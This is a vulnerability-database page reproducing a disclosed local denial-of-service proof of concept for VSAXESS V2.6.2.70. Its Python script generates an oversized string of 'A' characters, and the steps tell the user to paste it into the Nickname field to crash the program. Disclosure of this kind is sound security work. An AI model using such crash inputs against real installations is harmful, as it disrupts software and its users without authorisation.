Lucene search
K

VSAXESS V2.6.2.70 build20171226_053 - Nickname Denial of Service Exploit

🗓️ 03 Sep 2018 00:00:00Reported by Diego SantamariaType 
zdt
 zdt
🔗 0day.today👁 19 Views

VSAXESS V2.6.2.70 'Nickname' DoS Exploi

Code
# Exploit Title: VSAXESS V2.6.2.70 build20171226_053 - 'Nickname' Denial of Service (PoC)
# Discovery by: Diego Santamaria
# Vendor Homepage: https:https://www.visionistech.com/en/home/
# Software Link: https://www.visionistech.com/en/vsaxess-desktop-software/
# Tested Version: V2.6.2.70 build20171226_053
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional
  
# Steps to Reproduce: 
 
# 1. Run the python code Nickname.py 
# 2. Open nickname_exploit.txt and copy the content 
# 3. Open VSAXESS.exe 
# 4. Register a password and username
# 5. choose 'Add'
# 6. choose 'Serial Port'
# 6. Paste the content from nickname_exploit.txt on 'Nickname'
# 7. Press 'Aceptar' and Crashed
  
#!/usr/bin/env python
 
content = "\x41" * 9300
f = open ("nickname_exploit.txt", "w")
f.write(content)
f.close()

#  0day.today [2018-09-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Sep 2018 00:00Current
7.4High risk
Vulners AI Score7.4
19